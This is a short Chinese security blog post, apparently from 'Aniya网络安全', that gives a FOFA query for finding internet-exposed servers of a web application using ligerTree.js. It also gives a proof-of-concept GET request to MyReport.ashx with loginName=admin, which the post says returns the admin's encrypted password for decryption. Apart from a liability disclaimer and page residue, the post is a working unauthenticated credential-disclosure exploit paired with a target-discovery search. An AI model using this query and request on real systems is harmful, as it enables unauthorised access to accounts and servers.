本文提醒读者,Aniya网络安全的文章仅供个人研究,使用时需自行承担风险。文章提及了一个漏洞POC示例,涉及GET请求和数据加密,强调未经授权使用可能导致后果自负。
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
0x01 FoFa语句
body="JS/ligerComboBox/ligerTree.js"
0x02 漏洞POC
GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close响应包中包含加密的Passwd 需要解密之后才可以看到明文
428
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
